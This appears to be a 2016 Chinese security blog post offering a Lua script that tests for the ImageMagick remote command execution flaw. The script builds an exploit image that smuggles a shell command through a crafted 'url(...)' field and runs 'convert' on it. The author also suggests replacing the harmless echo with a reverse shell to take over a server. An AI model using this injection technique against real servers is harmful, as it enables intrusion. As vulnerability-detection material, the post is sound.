酷应用

Sevck:ImageMagick远程命令执行工具检测工具

技术 作者:站内编辑 2016-05-05 10:31:22
737185-20160505161804826-1297089543 737185-20160505161812466-1280321491 ImageMagick这个漏洞昨天晚上就出来了,今天才有时间研究一下,今天自己也测试了一下 效果图: 737185-20160505161949122-154715531 用lua写了一个检测脚本 1 print ("Checking...") 2 file=io.open("exp.jpg","w") 3 --file:write("s") 4 file:write("push graphic-context\r\nviewbox 0 0 640 480\r\n") 5 file:write("fill 'url(https://example.com/image.jpg") 6 file:write('"|echo "success!!!)') 7 file:write("'\r\n") 8 file:write("pop graphic-context") 9 file:close() 10 cmd=io.popen("convert exp.jpg test.png") 11 result=cmd:read("*all") 12 print(result) 如果存在返回 737185-20160505162250872-1158735855s
当然playload自己改吧,可以直接反弹个shell回来,直接拿到服务器权限   附上一篇分析文章: http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0
 

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

*文章为作者独立观点,不代表 爱尖刀 立场
本文由 站内编辑发表,转载此文章须经作者同意,并请附上出处( 爱尖刀 )及本页链接。
原文链接 https://www.ijiandao.com/safe/cto/22879.html
命令执行 Sevck ImageMagick 远程命令 远程命令执行
图库
站内编辑 站内编辑
公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接
百度热搜榜
排名 热点 搜索指数
iTrust
AiDeep Ued
关于我们 联系我们 升级日志 法律声明 广告服务 侵删通道
Copyright © 2021 K2CMS All rights reserved.
京ICP备14006288号